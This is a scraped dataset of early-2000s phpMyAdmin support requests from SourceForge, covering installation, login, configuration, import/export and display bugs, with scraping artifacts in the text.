HELP sandman0035 hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 148 https sourceforge.net p phpmyadmin support requests 148 Original author anonymous","bug"
"24444","1966","editing a table.
this is very strange.
For some reason this only 1 table wont let me edit it.
It says amp;quot;You have an error in your SQL syntax near AN at line 1 amp;quot;.
Can you help me fix it.
Thanks Its all current.
Original URL https sourceforge.net p phpmyadmin support requests 149 https sourceforge.net p phpmyadmin support requests 149 Original author kingkly","bug"
"24444","1967","dump amp; upload of binary data.
I have a database that contains binary data in long blob fields and I need to recreate the database on another server.
When I dump structure and data and then upload the sql dump file I can recreate the structure and most of the data is recreated ... but ... the binary data gif s and jpg s) are corrupted.
I m assuming that the problem is that the data is transferred as ASCII rather than binary data.
How do I get around that?
Original URL https sourceforge.net p phpmyadmin support requests 150 https sourceforge.net p phpmyadmin support requests 150 Original author anonymous","bug"
"24444","1968","Unable to unstuff.
I ve downloaded phpmyadmin 2.3.3pl1 php.tar.gz.
Stuffit Expander latest version, on MacOS 10.1.5) unpacks the .gz part, but when it tries to continue with the .tar, it throws a message box amp;quot;An error has occured while expanding the file amp;quot;phpMyAdmin.tar amp;quot;.
Permissions error on file open.
Error 54 amp;quot;.
Also other versions of phpMyAdmin result in the same problem.
Other files are unpacked correctly.
When viewing authorisations on the file, I m the owner not root), and I m allowed to read and change.
Anybody know what is wrong or can suggest a workaround?
Original URL https sourceforge.net p phpmyadmin support requests 151 https sourceforge.net p phpmyadmin support requests 151 Original author anonymous","bug"
"24444","1969","Error Browsing Tables.
PHPMyAdmin v2.3.3 When ever i try to Browse any table i get this error amp;quot;Notice Undefined variable fields meta in home connect www PHPMyAdmin sql.php on line 489 amp;quot; It then displays the query info but none of the Results.
Anyone know what is wrong?
I recently added the config code to add support for column comments, pdf pages, relation, and stuff like that.
Thanks for your help in advance.
Original URL https sourceforge.net p phpmyadmin support requests 152 https sourceforge.net p phpmyadmin support requests 152 Original author jfiore","bug"
"24444","1970","Win2K http authentication.
THROW ME A BONE!
If I edit config.inc.php line 71 to http I get the challenge response when hitting the main page and I use my system admin login and password Welcome to phpMyAdmin 2.3.3pl1 MySQL 4.0.5 beta max nt running on localhost I can drop tables and do just about everything except, Create new database [Documentation] No Privileges I also get the challenge response when trying to log out and only lets me cancel which leads to HTTP 401.5 Unauthorized Authorization by ISAPI or CGI application failed Internet Information Services With config.inc.php line 71 set to config I m in with full access rights, but with red error message Your configuration file contains settings root with no password) that correspond to the default MySQL privileged account.
Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.
I ve tried editing the lines 72 and 73 to cfg[ Servers ][ i][ user ] = myusername ; MySQL user cfg[ Servers ][ i][ password ] = mypassword ; MySQL password which I understand is not the way to go....) and I get Access denied for user john 127.0.0.1 I ve read posts and docs all evening about this with no clear path for solution.
I m afraid being new to all this I ll leave my server wide open.
Original URL https sourceforge.net p phpmyadmin support requests 153 https sourceforge.net p phpmyadmin support requests 153 Original author anonymous","bug"
"24444","1971","work via CGI) IIS.
I using IIS with PHP as CGI) but I don t know why i can t login in phpmyadmin, if i ussing PHP as scriptmap) all Ok. How i can fix this bug , if this bug ????
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 154 https sourceforge.net p phpmyadmin support requests 154 Original author anonymous","bug"
"24444","1972","can t connect with config.inc.php.
when I try to run the phpmyadmin, from this URL http www.real2life.com phpmyadmin I receive this error amp;quot;Can t connect to local MySQL server through socket tmp mysql.sock 2) amp;quot; I have been trying for two days to figure this one out.
Thank you for help in advance.
Original URL https sourceforge.net p phpmyadmin support requests 155 https sourceforge.net p phpmyadmin support requests 155 Original author anonymous","bug"
"24444","1973","Upload of text file.
I have been using phpMyAdmin 2.2.6 for months and find it an extremely useful tool.
We recently upgraded to PHP 4.3 and now my upload of text files is blown out of the water.
Error Text SQL query LOAD DATA LOCAL INFILE tmp php phpN1rhWa INTO TABLE `assets` FIELDS TERMINATED BY , ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL said The file tmp php phpN1rhWa must be in the database directory or be readable by all I ve followed item 1.8 in the documentation in trying to solve the problem but still no go.
The error message I receive is Mysql related rather than a safe mode problem.
What to do?
Peg Harstvedt pharstvedt littlerock.state.ar.us Original URL https sourceforge.net p phpmyadmin support requests 156 https sourceforge.net p phpmyadmin support requests 156 Original author anonymous","bug"
"24444","1974","left pane only works properly in arabic and thai.
right hand side of phpmyadmin homepage works for all languages but left hand side where there should be a list of the databases where you click on each to get the details) does not load at all in english.
in some of the other languages the left side will load but it just returns blank pages instead of the details of the tables and databases, apart from arabic and thai where it appears to works properly.
this version i have is the latest i think and i do not have this problem on my pentium 3 700mhz win98 machine just my athlon xp 1500 winxp one.
thanks for any help that you could give me in solving this problem.
mike Original URL https sourceforge.net p phpmyadmin support requests 157 https sourceforge.net p phpmyadmin support requests 157 Original author brownas98","bug"
"24444","1975","quot;display field quot; does not work?.
Documentation say amp;quot;[6.7] How can I use the amp;quot;display field amp;quot; feature?
Starting from the previous example, create the PMA table info as explained in the configuration section, then browse your persons table, and move the mouse over a town code or country code.
amp;quot; Yes, I can click on it since the relations are working fine.
But I thought, that the real value would be displayed when hoovering?
Heres my example simple artist song cd relation) SELECT `song`.`name` , `artist`.`name` , `media`.`name` FROM media LEFT JOIN `song` ON `media`.`ID` = `song`.`mediaID` LEFT JOIN `artist` ON `song`.`artistID` = `artist`.`ID` LIMIT 0, 30 Output is ok, so relations are ok...all PMA tables are online...so what left to do?
Original URL https sourceforge.net p phpmyadmin support requests 158 https sourceforge.net p phpmyadmin support requests 158 Original author daemon72","bug"
"24444","1976","Warning mysql fetch row ) supplied argument is not a valid.
Hi, I have changed servers and since moving my PHP MYSQL site the following errors have been noticed.
Any help would be appreciated..
Warning mysql fetch row ) supplied argument is not a valid MySQL result resource in home sitename public html includes sql layer.php on line 271 layer4switch....
Original URL https sourceforge.net p phpmyadmin support requests 159 https sourceforge.net p phpmyadmin support requests 159 Original author anonymous","bug"
"24444","1977","mysql command error.
Warning Supplied argument is not a valid MySQL result resource in C \apache\htdocs\phpmyadmin\tbl change.php on line 12 I was trying to alter mysql variables Original URL https sourceforge.net p phpmyadmin support requests 160 https sourceforge.net p phpmyadmin support requests 160 Original author dprophit","bug"
"24444","1978","Load text file always fails ?????.
I am tring to import my database using phpmyAdmin the read dump always fails in read text file with the result amp;quot;No SQL amp;quot; when I copy the sql into the sql window it works!)
, what is the problem with load text file ???
thanks in advance liran liran write tec.com Original URL https sourceforge.net p phpmyadmin support requests 161 https sourceforge.net p phpmyadmin support requests 161 Original author anonymous","bug"
"24444","1979","New install.
Hello, I m a real newbie at all of this Linux programming, so please bear with me.
I read what information was available and installed phpMyAdmin according to what was there.
Apache is running great.
Mysql seems to be running just fine and I manually added the phpnuke database to it.
I have a problem with phpMyadmin when I try to access it.
I get the following error message no matter what I do and I did follow the documentation link that I saw and edited the php.ini file as directed) cannot load MySQL extension, please check PHP Configuration.
Documentation My question is What am I doing wrong?
It appears to find the files ok, but will not load because of that error.
Do I have to recompile php after editing the php.ini file somewhere?
If so, how do I accomplish that?
If this is beyond the scope of your support system, please point me in the right direction.
Thank you.
Original URL https sourceforge.net p phpmyadmin support requests 162 https sourceforge.net p phpmyadmin support requests 162 Original author tech center","bug"
"24444","1980","Configuration Question.
Okay, I got MySQL and PHP installed and configured.
But I m trying to get phpMyAdmin running so s I have that GUI I ve come to know and love to work in.
But I think I ve misunderstood or just plain botched up something.
Anyone around today with a handle on this stuff?
I m trying to work along with the amp;quot;Serve It Up amp;quot; article in November s Macworld.
I installed phpMyAdmin.
But in editing the config.inc.php file something s not right.
I scanned amp;quot;down the page for the line starting cfg[ PmaAbsoluteUri ... amp;quot;, and entered http localhost username phpmyadmin amp;quot;between the apostrophes.... amp;quot; Now I typed amp;quot; username amp;quot;, literally.
Should I have typed my actual shortened username?
Reason I ask will become apparent in a bit.
I did the rest of the instructs, entering the database s root password that I d designated under amp;quot;Security and Start Up amp;quot; instructs.
It does mean my making up a brand new password, right?
It s confusing because the next line talks about making sure user string is set to amp;quot;root amp;quot; it was and entering my database s root password.
They re not referring back to logging in as amp;quot;root amp;quot;, are they, with the password I use for that?
Finally, having done as I just said that is, assuming they did NOT mean logging in as amp;quot;root amp;quot; and using that password I tried to access phpMyAdmin, per amp;quot;Create a Database and Table amp;quot; instructions through my browser, I m welcomed to phpMyAdmin and also told access is denied because amp;quot;Wrong username password amp;quot;.
A little help, please?
Please feel free to email me at stiano optonline.net.
Thanks very much, Steve Tiano Original URL https sourceforge.net p phpmyadmin support requests 163 https sourceforge.net p phpmyadmin support requests 163 Original author stiano","bug"
"24444","1981","how configure the relational database in phpMyAdmin.
plz help me i was work on phpmyadmin1.3 and it was very good then i installed package called phpdev which install phpmyadmin 3.2 with it after that was the problem no query did correctly and can t insert in the database because what is said that u must configure the phpmyadmin 3.3 to be relational database Original URL https sourceforge.net p phpmyadmin support requests 164 https sourceforge.net p phpmyadmin support requests 164 Original author anonymous","bug"
"24444","1982","2.3.3 pl1) Insert Text File Errors.
I get the follwoing errors when I ve tried to insert a textfile into a table amp;lt; Start of Error amp;gt; Notice Undefined variable db in E \intranet\phpmyadmin\tbl properties common.php on line 27 Notice Undefined variable db in E \intranet\phpmyadmin\tbl properties common.php on line 32 Notice Undefined variable table in E \intranet\phpmyadmin\tbl properties common.php on line 33 Warning Cannot modify header information headers already sent by output started at E \intranet\phpmyadmin\tbl properties common.php 27) in E \intranet\phpmyadmin\libraries\db table exists.lib.php on line 16 amp;lt; End of Error amp;gt; I m using 3.23.52 max nt on IIS with the latest version of php.... Any thoughts?
Original URL https sourceforge.net p phpmyadmin support requests 165 https sourceforge.net p phpmyadmin support requests 165 Original author jnsolutions","bug"
"24444","1983","Large table file upload fails.
Hello all, System OSX.2 development environment) phpMyAdmin 2.3.2 MySQL 3.23.53 PHP Version 4.2.3 also same problem on Red Hat Linux virtual hosted web site) phpMyAdmin 2.3.2 MySQL 3.23.41 PHP Version 4.2.2 Here is the problem.
I have a huge 11.5mb file with all the data and table structure in it.
The actual table structure is only about 1.5mb the rest of the file is all the table data.
Its all text, no images or files.
This is being imported into a site based on a osCommerce shopping cart.
Here is a link to osCommerce http www.oscommerce.com as reference.
I get a timeout or an error amp;quot;no sql amp;quot; when I try to use the phpMyAdmin SQL upload text file feature.
The querie works fine if I cut and paste it peice by peice but this is very time consuming.
I m new to MySQL and don t know what line commands I could use to move this file via the TERMINAL window.
Would prefer to obviously figure out how to do this using phpMyAdmin, seems easier.
Any ideas would be appreciated.
Thanks in advance.
Bill Original URL https sourceforge.net p phpmyadmin support requests 166 https sourceforge.net p phpmyadmin support requests 166 Original author itsmrbill","bug"
"24444","1984","quot;no input file error XP IIS.
I am running a mySQL server on IIS on WinXP standalone therefore localhost)...the mySQL server is running fine...installed myPHPAdmin and changed config.inc.php values for username and password only, left all others as defualt...upon attempting to go to index.php in myPHPAdmin folder i get a amp;quot;No input file specified.
amp;quot;.
I m a newbie at this and don t know what s wrong.
Thanks in advance.
dVC twilightdelight hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 167 https sourceforge.net p phpmyadmin support requests 167 Original author anonymous","bug"
"24444","1985","2.3.3 pl1) Can anybody log in without password?.
I downloaded the 2.3.3 pl1 edition, unpacked it, removed the root username and change authentication method to amp;quot;cookie amp;quot; in config.inc.php.
Then I was able to log onto all databases using any non existent user name and empty password.
That is not possible in 2.3.2 with the same configuration.
Maybe this is just a configuration issue, but my guess would be that several people use this configuration and are not aware that their databases are therefore totally open for everybody in 2.3.3 pl1.
Original URL https sourceforge.net p phpmyadmin support requests 168 https sourceforge.net p phpmyadmin support requests 168 Original author normann1974","bug"
"24444","1986","Browse showing wrong data..
I uploaded it to the demo site.
The table is called combine.
Each row has 1 of the number columns set, but phpMyAdmin doesn t show this or shows more than one.
Chech the data dump vs. what is shown in Browse.
Original URL https sourceforge.net p phpmyadmin support requests 169 https sourceforge.net p phpmyadmin support requests 169 Original author anonymous","bug"
"24444","1987","DB login through dreamweaver.
Is there any way I can retrieve the info I need to login my database through Dreamweaver?
I have an account to create, edit etc.
databases through phpMyAdmin, but I don t know how to connect to the database through web forms.
Can anybody help me?
Thanx.
Original URL https sourceforge.net p phpmyadmin support requests 170 https sourceforge.net p phpmyadmin support requests 170 Original author anonymous","bug"
"24444","1988","Create Table gt; TEXAERA.
Bonjour tout le monde !
Voici ce que je cherche xc5x95 faire J ouvre un fichier amp;quot;toto.sql amp;quot; dans mon amp;lt;texaera amp;gt;.
toto.sql est un DUMP PhpMyAdmin d une de mes base de donnxc3xa9e.
amp;lt;textarea name= amp;quot;sql query amp;quot; rows= amp;quot;30 amp;quot; cols= amp;quot;60 amp;quot; wrap= amp;quot;soft amp;quot; amp;gt; amp;lt;?
fichier requete = amp;quot;toto.sql amp;quot;; fh = fopen fichier requete, amp;quot;r amp;quot;); s = fgets fh, 1024); if fh) \{ while !feof fh)) \{ echo s); s = fgets fh, 1024); \} \} else \{ \} fclose fh); ?
amp;gt; amp;lt; textarea amp;gt; Ensuite je souhaiterai exxc3xa9cuter un script php qui va prendre l ensemble des donnxc3xa9e Creat Table .......) amp;lt;?
include amp;quot;connect.php amp;quot;); Creations des tables chaine = stripslashes sql query); requete= chaine; resultatInsert=mysql query requete, connexion) or die requete .
.
mysql error )); ?
amp;gt; Mais xc3xa9videment xc3xa7a ne marche pas ... est ce que quelqu un xc5x95 une idxc3xa9e xc5x95 tous hasard ??
Merci beaucoup de vos rxc3xa9ponses !!
fabien.lierville calvados.pref.gouv.fr Original URL https sourceforge.net p phpmyadmin support requests 171 https sourceforge.net p phpmyadmin support requests 171 Original author anonymous","bug"
"24444","1989","Duplicate columns in create table.
I want to create a new table.
After submitting the column name and types, each column appears twice in the create table statement, though I specify the column only once, e.g.
CREATE TABLE `testtable` `rowid` INT 11 ) NOT NULL AUTO INCREMENT PRIMARY KEY , `rowid` INT 11 ) NOT NULL AUTO INCREMENT ) The same happens when I try to drop an existing table, the generated statement looks like DROP TABLE `test` , `test` , `test` , `test` ; Looks like PhpMyAdmin is doing to many loops over the submitted form data... My configuration is RedHat Linux 7.2 MySQL 3.23.55 Max with InnoDB PHP 4.3.0 PhpMyAdmin 2.3.2 Apache 2.0.44 My contact johannes.lietz antwerpes.de Original URL https sourceforge.net p phpmyadmin support requests 172 https sourceforge.net p phpmyadmin support requests 172 Original author anonymous","bug"
"24444","1990","strange double inserts in smalltext fields.. 2.4.0RC 1 latest snapshot, and normal 2.4.0RC 1 When updating an smalltext field, with more then 1000 characters, the date gets inserted randomly for the second time.
Example b amp;gt;Unie van Utrecht amp;lt; b amp;gt; amp;lt;p amp;gt; De provincies in ons land hebben een geschiedenis die teruggaat tot 1579.
Op 23 januari van dat jaar sloten zeven provincies de Unie van Utrecht.
Daarmee ontstond feitelijk de Republiek der Zeven Verenigde Provincixc3xabn.
De Unie was eigenlijk alleen een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; amp;lt;b amp;gt;Bataafse Republiek amp;lt; b amp;gt; amp;lt;p amp;gt; Met de komst van Napoleon in 1795 kwam er een einde aan de Unie van Utrecht en de macht van de provincies.
Napoleon vestigde de Bataafse Republiek waardoor een eenheidsstaat was ontstaan met een centraal gezag.
De provincies verloren hun zelfstandigheid en dienden alleen nog als administratief lichaam dat onder strikt toezicht stond van het centrale gezag.
Uiteraard stond deze nieuwe republiek sterk onder invloed van Frankrijk.
Naarmate deze invloed groter werd, mocht zelfs het woord provincie niet meer gebruikt worden; de provincies heetten toen departementen.
amp;lt;p amp;gt; amp;lt;b amp;gt;Koninkrijk der Nederlanden amp;lt; b amp;gt; amp;lt;p amp;gt; In 1813 verloor Napoleon zijn positie en de Nederlandse soevereiniteit keerde terug.
Hoewel de nieuwe grondwet van 1814 wel de oude provinciale indeling herstelde bl een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; will get inserted as amp;lt;b amp;gt;Unie van Utrecht amp;lt; b amp;gt; amp;lt;p amp;gt; De provincies in ons land hebben een geschiedenis die teruggaat tot 1579.
Op 23 januari van dat jaar sloten zeven provincies de Unie van Utrecht.
Daarmee ontstond feitelijk de Republiek der Zeven Verenigde Provincixc3xabn.
De Unie was eigenlijk alleen een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; amp;lt;b amp;gt;Bataafse Republiek amp;lt; b amp;gt; amp;lt;p amp;gt; Met de komst van Napoleon in 1795 kwam er een einde aan de Unie van Utrecht en de macht van de provincies.
Napoleon vestigde de Bataafse Republiek waardoor een eenheidsstaat was ontstaan met een centraal gezag.
De provincies verloren hun zelfstandigheid en dienden alleen nog als administratief lichaam dat onder strikt toezicht stond van het centrale gezag.
Uiteraard stond deze nieuwe republiek sterk onder invloed van Frankrijk.
Naarmate deze invloed groter werd, mocht zelfs het woord provincie niet meer gebruikt worden; de provincies heetten toen departementen.
amp;lt;p amp;gt; amp;lt;b amp;gt;Bataafse Republiek amp;lt; b amp;gt; amp;lt;p amp;gt; Met de komst van Napoleon amp;lt;b amp;gt;Koninkrijk der Nederlanden amp;lt; b amp;gt; amp;lt;p amp;gt; In 1813 verloor Napoleon zijn positie en de Nederlandse soevereiniteit keerde terug.
Hoewel de nieuwe grondwet van 1814 wel de oude provinciale indeling herstelde bl een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; in 1795 kwam er een einde aan de Unie van Utrecht en de macht van de provincies.
Napoleon vestigde de Bataafse Republiek waardoor een eenheidsstaat was ontstaan met een centraal gezag.
De provincies verloren hun zelfstandigheid en dienden alleen nog als administratief lichaam dat onder strikt toezicht stond van het centrale gezag.
Uiteraard stond deze nieuwe republiek sterk onder invloed van Frankrijk.
Naarmate deze invloed groter werd, mocht zelfs het woord provincie niet meer gebruikt worden; de provincies heetten toen departementen.
amp;lt;p amp;gt; amp;lt;b amp;gt;Koninkrijk der Nederlanden amp;lt; b amp;gt; amp;lt;p amp;gt; In 1813 verloor Napoleon zijn positie en de Nederlandse soevereiniteit keerde terug.
Hoewel de nieuwe grondwet van 1814 wel de oude provinciale indeling herstelde bl een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
Can this be solved ?
and how ?
Thanks Silvester van der Leer phpbugs serial.nl Original URL https sourceforge.net p phpmyadmin support requests 173 https sourceforge.net p phpmyadmin support requests 173 Original author silvestertje","bug"
"24444","1991","2.3.3pl1) Error adding users Duplicate User.
Any host User test Error SQL query INSERT INTO mysql.user SET Host = , User = test , PASSWORD = PASSWORD ) , Select priv = Y , Insert priv = Y , Update priv = Y , Delete priv = Y , Create priv = Y , Drop priv = Y , Reload priv = N , Shutdown priv = N , Process priv = N , File priv = N , Grant priv = N , References priv = N , Index priv = N , Alter priv = Y MySQL said Duplicate entry N for key 2 \ Keep geting this error when I add user with phpmyadmin and mysql console command Original URL https sourceforge.net p phpmyadmin support requests 174 https sourceforge.net p phpmyadmin support requests 174 Original author kip000","bug"
"24444","1992","aboute sql result to file!.
why is t there funktion to send the result of SQL quest by a file?
Original URL https sourceforge.net p phpmyadmin support requests 175 https sourceforge.net p phpmyadmin support requests 175 Original author blackshadow","bug"
"24444","1993","documentation so dark for me.
hi, i m french and my english isn t very well and i have some difficulty to do work fine myadmin.
I m trying to configure it right but all documentation is in english and a little bit amp;quot;obscur amp;quot; for me.
I ve a lot of questions that it may be so good for me to have responses in french.
Is threre anybody to help me ?
My problems are that i don t know if i must put the myadmin folder in all webs that are installed on the server or just one folder put at the root of my webs.
And how to do to give an access to myadmin by account.
I ve tried http auth but it didn t seem to work.
None password and login work.
If i want to access the myadmin i must let config mode with no pass and no login.
The server is an iis4 and i m not a amp;quot;pro amp;quot; of iis config also.
Thanks in advance chris please, reply me by mail at chris cardonille.com Original URL https sourceforge.net p phpmyadmin support requests 176 https sourceforge.net p phpmyadmin support requests 176 Original author anonymous","bug"
"24444","1994","Error creating tables.
When i try to create tables, i only get a MySQL error, stating amp;quot;Intet tabelnavn!
amp;quot; or in english amp;quot;No tablename amp;quot;.
Both PHP and MySQL are running on my XP machine.
MySQL version 3.23.41 and Phpmyadmin version 2.3.3pl1 although i had the same problem with 2.2) PHP version 4.2.0 Any ideas?
Original URL https sourceforge.net p phpmyadmin support requests 177 https sourceforge.net p phpmyadmin support requests 177 Original author colde","bug"
"24444","1995","Error Exporting very large data structure.
When I attempt to export a very large table with very large data fields, I get the following error.
Fatal error Allowed memory size of 8388608 bytes exhausted tried to allocate 1296025 bytes) in var www portal admin modules phpMyAdmin 2.4.0 rc1 libraries build dump.lib.php on line 276 Now, I must say that I got no error when using 2.3.2 BUT I got a currupt export so the results are better from an operational point of view.
The data is there and I can access it from MYsql but not from the MYadmin.
I was attempting to backup my data before I did an upgrade, all tables were exportable except this one.
The problem table is 63.9 MB large as it is beign used to hold attachment files.
Any one else seeing this as an issue ?
Original URL https sourceforge.net p phpmyadmin support requests 178 https sourceforge.net p phpmyadmin support requests 178 Original author recumbent615","bug"
"24444","1996","Index to phpMyAdmin.
This is what i get when i log on to phpMyAdmin, tought it was a GUI.
Index of phpMyAdmin Name Size Date Time Type .. 11 02 2003 03 45 37 Directory CVS 11 02 2003 03 39 13 Directory images 11 02 2003 03 39 15 Directory lang 11 02 2003 03 39 13 Directory libraries 11 02 2003 03 39 16 Directory scripts 11 02 2003 03 39 16 Directory ANNOUNCE.txt 6182 b 14 08 2002 21 24 26 text plain CREDITS 173 b 19 08 2001 20 06 22 application octet stream ChangeLog 132 K 03 02 2003 00 30 14 application octet stream Documentation.html 109 K 03 02 2003 00 32 06 text html Documentation.txt 87 K 03 02 2003 00 33 22 text plain INSTALL 182 b 03 08 2001 09 19 36 application octet stream LICENSE 14 K 03 08 2001 14 04 10 application octet stream README 2778 b 14 08 2002 21 24 28 application octet stream RELEASE DATE 2.4.0 rc1 29 b 03 02 2003 00 33 42 application octet stream TODO 239 b 03 08 2001 14 18 36 application octet stream badwords.txt 2043 b 17 04 2002 20 00 10 text plain chk rel.php 463 b 03 02 2003 00 34 04 application octet stream config.inc.php 22 K 11 02 2003 03 45 37 application octet stream db create.php 910 b 03 02 2003 00 34 04 application octet stream db datadict.php 9723 b 03 02 2003 00 34 04 application octet stream db details.php 8286 b 03 02 2003 00 34 04 application octet stream db details common.php 1759 b 03 02 2003 00 34 04 application octet stream db details db info.php 3194 b 03 02 2003 00 34 04 application octet stream db details export.php 7575 b 03 02 2003 00 34 04 application octet stream db details...tdocsql.php 6047 b 03 02 2003 00 34 04 application octet stream db details links.php 2143 b 03 02 2003 00 34 04 application octet stream db details qbe.php 37 K 03 02 2003 00 34 04 application octet stream db details structure.php 20 K 03 02 2003 00 34 04 application octet stream db printview.php 8714 b 03 02 2003 00 34 04 application octet stream db search.php 14 K 03 02 2003 00 34 04 application octet stream db stats.php 13 K 03 02 2003 00 34 04 application octet stream docs.css 2803 b 01 02 2003 16 27 40 text css footer.inc.php 1243 b 03 02 2003 00 34 04 application octet stream header.inc.php 13 K 03 02 2003 00 34 04 application octet stream header printview.inc.php 3192 b 03 02 2003 00 34 04 application octet stream index.php 2146 b 03 02 2003 00 34 04 application octet stream ldi check.php 4586 b 03 02 2003 00 34 04 application octet stream ldi table.php 4511 b 03 02 2003 00 34 04 application octet stream left.php 20 K 03 02 2003 00 34 04 application octet stream main.php 22 K 03 02 2003 00 34 04 application octet stream mult submits.inc.php 7304 b 03 02 2003 00 34 04 application octet stream pdf pages.php 13 K 03 02 2003 00 34 04 application octet stream pdf schema.php 48 K 03 02 2003 00 34 04 application octet stream phpinfo.php 408 b 03 02 2003 00 34 04 application octet stream read dump.php 16 K 03 02 2003 00 34 04 application octet stream server common.inc.php 894 b 03 02 2003 00 34 04 application octet stream server links.inc.php 1179 b 03 02 2003 00 34 04 application octet stream server privileges.php 75 K 03 02 2003 00 34 04 application octet stream server processlist.php 3409 b 03 02 2003 00 34 04 application octet stream server status.php 11 K 03 02 2003 00 34 04 application octet stream server variables.php 2707 b 03 02 2003 00 34 04 application octet stream sql.php 24 K 03 02 2003 00 34 04 application octet stream tbl addfield.php 8126 b 03 02 2003 00 34 04 application octet stream tbl alter.php 4700 b 03 02 2003 00 34 04 application octet stream tbl change.php 26 K 03 02 2003 00 34 04 application octet stream tbl create.php 7593 b 03 02 2003 00 34 04 application octet stream tbl dump.php 15 K 03 02 2003 00 34 04 application octet stream tbl indexes.php 20 K 03 02 2003 00 34 04 application octet stream tbl move copy.php 4555 b 03 02 2003 00 34 04 application octet stream tbl printview.php 20 K 03 02 2003 00 34 04 application octet stream tbl properties.inc.php 12 K 03 02 2003 00 34 04 application octet stream tbl properties.php 616 b 03 02 2003 00 34 04 application octet stream tbl proper... common.php 1063 b 03 02 2003 00 34 04 application octet stream tbl proper... export.php 9203 b 03 02 2003 00 34 04 application octet stream tbl properties links.php 2590 b 03 02 2003 00 34 04 application octet stream tbl proper...rations.php 12 K 03 02 2003 00 34 04 application octet stream tbl proper...options.php 7693 b 03 02 2003 00 34 04 application octet stream tbl proper...ructure.php 20 K 03 02 2003 00 34 04 application octet stream tbl proper...le info.php 1878 b 03 02 2003 00 34 04 application octet stream tbl query box.php 7990 b 03 02 2003 00 34 04 application octet stream tbl relation.php 13 K 03 02 2003 00 34 04 application octet stream tbl rename.php 1424 b 03 02 2003 00 34 04 application octet stream tbl replace.php 6679 b 03 02 2003 00 34 04 application octet stream tbl replace fields.php 3591 b 03 02 2003 00 34 04 application octet stream tbl select.php 10 K 03 02 2003 00 34 04 application octet stream translators.html 12 K 03 02 2003 00 32 32 text html user password.php 4857 b 03 02 2003 00 34 04 application octet stream Abyss Web Server X1 xc5xa0 Aprelium Technologies 2001 2002 Original URL https sourceforge.net p phpmyadmin support requests 179 https sourceforge.net p phpmyadmin support requests 179 Original author anonymous","bug"
"24444","1997","Feature request save custom queries.
With the help of nix friends and my own brain, I am querying my databases in severl way, some of them really advanced.
I save all these queries in a text file and copy and paste them into phpMyAdmin when needed.
Would it be possible to have a section in phpMyAdmin that allowed to save such custom queries and give them a amp;quot;telling amp;quot; name which then would allow even more lay people than me to perform these queries?
Eg a query of the kind SELECT t1.id, t1.ordernum, t1.title FROM seminar AS t1 LEFT JOIN seminar page AS t2 ON t1.ordernum = t2.ordernum WHERE t2.ordernum IS NULL ORDER BY `t1`.`id`; would be saved as amp;quot;Not in seminar.page amp;quot;.
Forgive for posting here.
I didn t find a amp;quot;feature request amp;quot; forum.
Original URL https sourceforge.net p phpmyadmin support requests 180 https sourceforge.net p phpmyadmin support requests 180 Original author splacknuck","enhancement"
"24444","1998","2.4.0 rc1) PHP Notice Undefined index compress.
When using phpmyadmin with the php.ini optimised 4.3.0 Apache2.0.44 mod php ) PHP Notice Undefined index compress in phpmyAdmin\libraries\common.lib.php on line 619 boring in the php error log Have not this error with the 2.3x phpmyadmin Original URL https sourceforge.net p phpmyadmin support requests 181 https sourceforge.net p phpmyadmin support requests 181 Original author tigerfoot","bug"
"24444","1999","Problems inserting a value into ENUM TYPE.
I am unable to insert a value into an ENUM Type this includes the mysql user and db databases).
When I try to insert a value into an ENUM it will try to do the Y,Y .
The ENUM type worked perfectly on the demo database on http www.phpmyadmin.net when I tested.
I am using phpMyAdmin 2.4.0 rc2, MySQL 3.23.54, PHP 4.2.2, and Apache 2.0.
Any suggestions would be greatly appreciated.
